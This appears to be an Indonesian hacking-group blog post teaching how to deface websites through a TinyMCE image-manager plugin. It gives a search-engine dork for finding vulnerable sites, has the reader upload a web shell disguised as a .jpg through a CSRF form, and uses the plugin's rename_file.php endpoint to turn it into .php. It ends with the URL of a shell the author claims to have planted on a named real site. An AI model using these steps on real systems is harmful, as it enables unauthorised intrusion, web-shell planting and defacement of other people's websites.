Deface Dengan Cara TinyMce Plugins Image Manager

hallo sobat, kembali lagi di blog Bangka Crew

Sebenarnya tutorial deface ini udh ada dari lama, cuman karna sibuk sama real life jadi ga sempet nulis tutorial

Ok kali ini gw share deface POC TinyMce Plugins Image Manager
caranya cukup mudah, , siapkan dulu shell yang ber extensi .jpg

Ok langsung aja

DORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )

Exploit : site.com/(path)/tinymce/plugins/image/upload.php

1. Kalian dorking dulu ke google, bing atau search engine lainnya, pke dork di atas yg gw kasih

2. site yg vuln seperti ini

Ciri Ciri Vuln tidak hanya seperti itu ada 

-blank

-{"success":false,"is_pdf":0,"reason":"File not

selected."}

3.selanjutnya upload shell dengan csrf ,gaada csrf? klick di bawah :
link csrf

4.Upload extensi shell .jpg  , inget jangan langsung upload ext .php, upload menggunakan csrf di atas yg gw kasih, ubah bagian <form action="site.com" dengan web yg vuln

5. lalu upload shell ext jpg nya, kalau sukses muncul seperti ini

6. Nah kalau muncul sepeti ini salin tulisan by_1.jpg nah yang kaya gitu

7. Lalu kita disini mengubah shell jpg kita menjadi php, gimana caranya? sans ikutin

http://site.com/[path]/tinymce/plugins/image/rename_file.php?current_name=NAMA-FILE-SHELL-YANG-BERHASIL-DI-UPLOAD.jpg&new_name=namashellbaru.php

8. kalau success muncul tulisan banyak seperti ini

9.tinggal kita akses deh
akses shell : site.com/[path]/tinymce/plugins/image/uploads/namashellyangbaru.php

ni akses gw :http://www.myphamthai.com.vn/tinymce/plugins/image/uploads/bangkaC.php

oke sekian
terima kasih telah berkunjung

Share this post